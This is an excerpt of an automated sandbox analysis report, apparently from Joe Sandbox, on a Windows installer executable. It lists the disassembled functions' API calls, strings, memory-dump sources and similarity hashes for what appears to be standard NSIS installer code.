        • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
        • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
        Function 00405F41 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
        Download Yara Rule
        APIs
        • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,004060D4,?,?), ref: 00405F50
        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,004060D4,?,?), ref: 00405F74
        • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
          • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
          • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
        • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
        • wsprintfA.USER32 ref: 00405FB8
        • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
        • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
        • GlobalFree.KERNEL32(00000000), ref: 004060A1
        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
          • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405DEB
          • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
        • String ID: %ls=%ls$NUL$[Rename]
        • API String ID: 222337774-899692902
        • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
        • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
        • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
        • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
        Function 004064A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
        Download Yara Rule
        APIs
        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
        • CharNextW.USER32(?,?,?,00000000), ref: 00406518
        • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
        • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
        Strings
        • "C:\Users\user\Desktop\Ej86aa7Ki7.exe", xrefs: 004064A6
        • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
        • *?|<>/":, xrefs: 004064F8
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Char$Next$Prev
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
        • API String ID: 589700163-2082602037
        • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
        • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
        • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
        • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
        Function 0040433D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
        Download Yara Rule
        APIs
        • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
        • GetSysColor.USER32(00000000), ref: 00404376
        • SetTextColor.GDI32(?,00000000), ref: 00404382
        • SetBkMode.GDI32(?,?), ref: 0040438E
        • GetSysColor.USER32(?), ref: 004043A1
        • SetBkColor.GDI32(?,?), ref: 004043B1
        • DeleteObject.GDI32(?), ref: 004043CB
        • CreateBrushIndirect.GDI32(?), ref: 004043D5
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
        • String ID:
        • API String ID: 2320649405-0
        • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
        • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
        • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
        • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
        Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
        Download Yara Rule
        APIs
        • ReadFile.KERNEL32(?,?,?,?), ref: 004026CC
        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740
          • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE
        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$Pointer$ByteCharMultiWide$Read
        • String ID: 9
        • API String ID: 163830602-2366072709
        • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
        • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
        • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
        • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
        Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
        Download Yara Rule
        APIs
        • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
        • GetTickCount.KERNEL32 ref: 00402E6C
        • wsprintfW.USER32 ref: 00402E9A
          • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
          • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
          • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
          • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
          • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
        • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
        • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
          • Part of subcall function 00402E17: MulDiv.KERNEL32(0033DE75,00000064,00342E93), ref: 00402E2C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
        • String ID: ... %d%%
        • API String ID: 722711167-2449383134
        • Opcode ID: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
        • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
        • Opcode Fuzzy Hash: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
        • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
        Function 00404C3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
        Download Yara Rule
        APIs
        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
        • GetMessagePos.USER32 ref: 00404C5E
        • ScreenToClient.USER32(?,?), ref: 00404C78
        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Message$Send$ClientScreen
        • String ID: f
        • API String ID: 41195575-1993550816
        • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
        • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
        • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
        • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
        Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
        Download Yara Rule
        APIs
        • GetDC.USER32(?), ref: 00401DB6
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
        • ReleaseDC.USER32(?,00000000), ref: 00401DE9
        • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CapsCreateDeviceFontIndirectRelease
        • String ID: Tahoma
        • API String ID: 3808545654-3580928618
        • Opcode ID: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
        • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
        • Opcode Fuzzy Hash: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
        • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
        Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
        Download Yara Rule
        APIs
        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
        • wsprintfW.USER32 ref: 00402DEA
        • SetWindowTextW.USER32(?,?), ref: 00402DFA
        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Text$ItemTimerWindowwsprintf
        • String ID: unpacking data: %d%%$verifying installer: %d%%
        • API String ID: 1451636040-1158693248
        • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
        • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
        • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
        • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
        Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
        Download Yara Rule
        APIs
        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
        • GlobalFree.KERNEL32(?), ref: 0040296C
        • GlobalFree.KERNEL32(00000000), ref: 0040297F
        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Global$AllocFree$CloseDeleteFileHandle
        • String ID:
        • API String ID: 2667972263-0
        • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
        • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
        • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
        • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
        Function 00404B2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
        Download Yara Rule
        APIs
        • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
        • wsprintfW.USER32 ref: 00404BD7
        • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: ItemTextlstrlenwsprintf
        • String ID: %u.%u%s%s$(7B
        • API String ID: 3540041739-1320723960
        • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
        • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
        • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
        • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
        Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402CB4
        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
        • RegCloseKey.ADVAPI32(?), ref: 00402CF9
        • RegCloseKey.ADVAPI32(?), ref: 00402D1E
        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
